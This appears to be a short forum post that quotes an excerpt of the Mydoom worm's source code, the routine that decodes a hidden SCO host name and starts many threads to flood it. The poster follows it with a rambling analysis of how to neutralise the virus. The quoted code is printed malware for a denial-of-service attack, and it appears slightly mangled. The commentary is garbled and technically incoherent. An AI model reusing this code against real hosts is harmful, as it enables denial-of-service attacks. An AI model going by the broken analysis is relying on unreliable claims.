This a bit escene of "My else Doom" source code:

void scodos_main(void)
{
struct hostent *h;
struct sockaddr_in addr;
int i;
unsigned long tid;
char buf[128];

rot13(buf, SCO_SITE_ROT13);

for (; {
while (is_online() == 0)
Sleep(32768);

h = gethostbyname(buf);
if (h == NULL) {
Sleep(32768);
continue;
}
memset(&addr, '\0', sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr = *(struct in_addr *)h->h_addr_list[0];
addr.sin_port = htons(SCO_PORT);
break;
}

for (i=1; i<SCODOS_THREADS; i++)
CreateThread(0, 0, scodos_th, (LPVOID)&addr, 0, &tid);
scodos_th(&addr);
}


that piece:

while (is_online() == 0)
Sleep(32768);

why is_online() function is not really check for "connection" that assume the "victim" is connected for two reasons:

1.- is_online() prototype take a if(THREAD_STATUS) check for internet appz!!!

2.- int value requested is always <> 0 that's result in a permanent virus activity


Now

addr.sin_addr = *(struct in_addr *)h->h_addr_list[0];

can fixed manually, put a simple C code reserved offset interval. The virus is inactive


Other resource maybe is tracking the 80 port or change the TCP/UDP limit transfer. (the virus not is affected for this action)

at one week i publish my investigation for W32 virus ways:

http://xr.homeunix.net/forum.html


Best Wishes


Az